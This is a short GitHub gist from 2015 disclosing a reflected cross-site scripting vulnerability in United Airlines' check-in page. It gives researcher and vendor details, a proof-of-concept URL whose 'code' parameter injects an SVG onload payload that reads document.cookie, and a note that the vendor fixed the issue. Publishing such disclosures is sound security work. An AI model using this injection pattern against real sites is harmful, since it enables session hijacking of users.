Skip to content

Instantly share code, notes, and snippets.

@xsuperbug

xsuperbug/United Airlines XSS Vulnerability

Created November 3, 2015 12:14
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save xsuperbug/698405e882740cd8f41f to your computer and use it in GitHub Desktop.
Save xsuperbug/698405e882740cd8f41f to your computer and use it in GitHub Desktop.
Download ZIP
Raw
United Airlines XSS Vulnerability
Name : United Airlines XSS Vulnerability
Vendor Homepage : http://www.united.com
Vulnerability Type : Cross-Site Scripting
Researcher : Evren Yalçın <evren [at] superbug [dot] co>
Example PoC is as follows :
http://www.united.com/travel/checkin/start.aspx?SID=&sessionKey=0DA191E8-342A-4FBE-A511-21C8702546D4&gLanguage=0&pat=False&code=PNR_NOT_FOUND_BY_ETICKET_LAST_NAME"><svg/onload=confirm(document.cookie)>//&opt=ET&1=&2=&3=123123123&4=
----
This issue was fixed by the vendor
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment